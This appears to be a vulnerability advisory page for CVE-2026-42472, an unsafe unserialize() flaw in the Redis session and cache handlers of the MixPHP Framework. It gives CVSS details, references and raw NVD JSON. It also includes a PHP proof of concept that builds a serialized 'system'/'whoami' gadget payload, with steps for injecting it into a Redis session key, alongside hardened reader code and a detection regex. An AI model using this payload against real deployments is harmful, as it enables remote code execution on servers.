Security Vulnerability Report
CVE-2026-42472 CVSS 9.8 CRITICAL

CVE-2026-42472

Published: 2026-05-01 16:16:32
Last Modified: 2026-05-05 19:39:59

Description

Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from Redis in the RedisHandler object.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MixPHP Framework 2.x
MixPHP Framework <= 2.2.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * PoC Generator for CVE-2026-42472
 * MixPHP Framework <= 2.2.17 Unsafe Deserialization
 *
 * This script generates a malicious serialized payload.
 * The payload targets the RedisHandler session/cache mechanism.
 */

namespace Mix\SyncInvoke;

// Hypothetical Gadget class based on referenced Server.php
// Attackers need to find a class in the framework with __destruct or __wakeup
// that performs dangerous actions (e.g., file operations, system calls).
class Server
{
    public $function;
    public $arguments;

    public function __construct()
    {
        // Target function to execute (e.g., system, shell_exec)
        $this->function = 'system';
        // Command arguments
        $this->arguments = ['whoami'];
    }
}

// Generate the payload object
$payloadObject = new Server();

// Serialize the object
$maliciousPayload = serialize($payloadObject);

// Output the payload
echo "[+] Generated Malicious Payload:\n";
echo $maliciousPayload . "\n";

echo "\n[+] Usage Instructions:\n";
echo "1. Connect to the target Redis instance used by MixPHP.\n";
echo "2. Inject the payload into a session key or cache key.\n";
echo "   Example Redis Command: SET PHPREDIS_SESSION:<session_id> '" . $maliciousPayload . "'\n";
echo "3. Trigger the MixPHP application to load the session/cache.\n";
echo "4. If a valid gadget chain exists, the command 'whoami' will execute.\n";
?>
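On the mitigation side, the following is an added example and not MixPHP project code: a hypothetical cache-read helper that shows the unsafe unserialize()-on-Redis-data pattern the description refers to, next to two hardened variants and a cheap pre-check that can be logged or alerted on. The function names, the constructed sample value and the detection regex are assumptions for illustration only.

```php
<?php
// Added example (not MixPHP code): unsafe vs. hardened handling of a value
// read back from a shared store such as Redis. Names here are assumptions.

// Constructed sample of an attacker-controlled stored value: a serialized
// PHP object. Any writer to the Redis key can supply such a string.
$storedValue = 'O:8:"stdClass":1:{s:3:"cmd";s:6:"whoami";}';

// UNSAFE: reconstructs arbitrary objects. Every autoloadable class with a
// __wakeup/__destruct/__toString side effect becomes a candidate gadget.
function readCacheUnsafe(string $raw)
{
    return unserialize($raw);
}

// HARDENED option 1: refuse object instantiation entirely. Any object in
// the payload becomes __PHP_Incomplete_Class, whose magic methods never run.
function readCacheNoObjects(string $raw)
{
    return unserialize($raw, ['allowed_classes' => false]);
}

// HARDENED option 2: store JSON rather than PHP serialization. json_decode
// never instantiates application classes, so there is no gadget surface.
// Malformed input raises JsonException instead of yielding a partial value.
function readCacheJson(string $raw): ?array
{
    $data = json_decode($raw, true, 512, JSON_THROW_ON_ERROR);
    return is_array($data) ? $data : null;
}

// DETECTION: flag stored values containing serialized objects ("O:<len>:"
// or custom-serialized "C:<len>:") before they reach unserialize(), so the
// attempt can be logged even where the safe reader is already in place.
function looksLikeSerializedObject(string $raw): bool
{
    return preg_match('/(^|[;{])[OC]:\d+:"/', $raw) === 1;
}

// Demonstration run.
echo "Unsafe reader produced: " . get_class(readCacheUnsafe($storedValue)) . "\n";
echo "No-objects reader produced: " . get_class(readCacheNoObjects($storedValue)) . "\n";
echo "Object marker detected: " . var_export(looksLikeSerializedObject($storedValue), true) . "\n";
print_r(readCacheJson('{"cmd":"whoami"}'));
```

Run it with `php` on any 7.3+ interpreter. The `allowed_classes => false` variant stops the gadget from ever being instantiated, but the preferred fix is to avoid the PHP serialization format for data that another process can write; the JSON reader removes the class of bug rather than one instance of it. The attack precondition in this advisory is write access to the Redis keys the handler reads, so Redis authentication, ACLs and network isolation of the instance are the other half of the mitigation.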

References

https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975
https://github.com/mix-php/mix
https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42472", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:31.587", "lastModified": "2026-05-05T19:39:58.510", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from Redis in the RedisHandler object."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php", "source": "[email protected]"}]}}